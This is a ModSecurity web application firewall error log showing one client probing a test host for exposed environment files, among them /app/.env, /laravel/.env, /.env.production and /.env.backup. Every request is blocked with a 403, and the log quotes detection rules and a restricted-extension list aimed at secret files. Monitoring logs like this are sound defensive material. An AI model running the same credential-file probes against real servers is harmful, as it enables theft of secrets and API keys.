[Sun Mar 15 10:46:53.731508 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abaADQY2Zu5JILf9IpngXAAAAAc"]
[Sun Mar 15 10:46:53.731635 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abaADQY2Zu5JILf9IpngXAAAAAc"]
[Sun Mar 15 10:46:53.754109 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "abaADQY2Zu5JILf9IpngXQAAAAc"]
[Sun Mar 15 10:46:53.754359 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "abaADQY2Zu5JILf9IpngXQAAAAc"]
[Sun Mar 15 10:46:53.754497 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "abaADQY2Zu5JILf9IpngXQAAAAc"]
[Sun Mar 15 10:46:53.777677 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "abaADQY2Zu5JILf9IpngXgAAAAc"]
[Sun Mar 15 10:46:53.777865 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "abaADQY2Zu5JILf9IpngXgAAAAc"]
[Sun Mar 15 10:46:53.777984 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "abaADQY2Zu5JILf9IpngXgAAAAc"]
[Sun Mar 15 10:46:53.800363 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "abaADQY2Zu5JILf9IpngXwAAAAc"]
[Sun Mar 15 10:46:53.800544 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "abaADQY2Zu5JILf9IpngXwAAAAc"]
[Sun Mar 15 10:46:53.800663 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "abaADQY2Zu5JILf9IpngXwAAAAc"]
[Sun Mar 15 10:46:53.822833 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abaADQY2Zu5JILf9IpngYAAAAAc"]
[Sun Mar 15 10:46:53.822984 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abaADQY2Zu5JILf9IpngYAAAAAc"]
[Sun Mar 15 10:46:53.823096 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abaADQY2Zu5JILf9IpngYAAAAAc"]
[Sun Mar 15 10:46:53.845401 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "abaADQY2Zu5JILf9IpngYQAAAAc"]
[Sun Mar 15 10:46:53.845560 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "abaADQY2Zu5JILf9IpngYQAAAAc"]
[Sun Mar 15 10:46:53.845673 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "abaADQY2Zu5JILf9IpngYQAAAAc"]
[Sun Mar 15 10:46:53.867994 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "abaADQY2Zu5JILf9IpngYgAAAAc"]
[Sun Mar 15 10:46:53.868151 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "abaADQY2Zu5JILf9IpngYgAAAAc"]
[Sun Mar 15 10:46:53.868265 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "abaADQY2Zu5JILf9IpngYgAAAAc"]
[Sun Mar 15 10:46:53.891349 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "abaADQY2Zu5JILf9IpngYwAAAAc"]
[Sun Mar 15 10:46:53.891543 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "abaADQY2Zu5JILf9IpngYwAAAAc"]
[Sun Mar 15 10:46:53.891664 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "abaADQY2Zu5JILf9IpngYwAAAAc"]
[Sun Mar 15 10:46:53.913918 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "abaADQY2Zu5JILf9IpngZAAAAAc"]
[Sun Mar 15 10:46:53.914070 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "abaADQY2Zu5JILf9IpngZAAAAAc"]
[Sun Mar 15 10:46:53.914185 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "abaADQY2Zu5JILf9IpngZAAAAAc"]
[Sun Mar 15 10:46:53.936688 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "abaADQY2Zu5JILf9IpngZQAAAAc"]
[Sun Mar 15 10:46:53.936843 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "abaADQY2Zu5JILf9IpngZQAAAAc"]
[Sun Mar 15 10:46:53.936960 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "abaADQY2Zu5JILf9IpngZQAAAAc"]
[Sun Mar 15 10:46:53.959324 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "abaADQY2Zu5JILf9IpngZgAAAAc"]
[Sun Mar 15 10:46:53.959499 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "abaADQY2Zu5JILf9IpngZgAAAAc"]
[Sun Mar 15 10:46:53.959611 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "abaADQY2Zu5JILf9IpngZgAAAAc"]
[Sun Mar 15 10:46:53.982243 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "abaADQY2Zu5JILf9IpngZwAAAAc"]
[Sun Mar 15 10:46:53.982424 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "abaADQY2Zu5JILf9IpngZwAAAAc"]
[Sun Mar 15 10:46:53.982540 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "abaADQY2Zu5JILf9IpngZwAAAAc"]
[Sun Mar 15 10:46:54.004726 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "abaADgY2Zu5JILf9IpngaAAAAAc"]
[Sun Mar 15 10:46:54.004880 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "abaADgY2Zu5JILf9IpngaAAAAAc"]
[Sun Mar 15 10:46:54.004990 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "abaADgY2Zu5JILf9IpngaAAAAAc"]
[Sun Mar 15 10:46:54.027042 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "abaADgY2Zu5JILf9IpngaQAAAAc"]
[Sun Mar 15 10:46:54.027256 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "abaADgY2Zu5JILf9IpngaQAAAAc"]
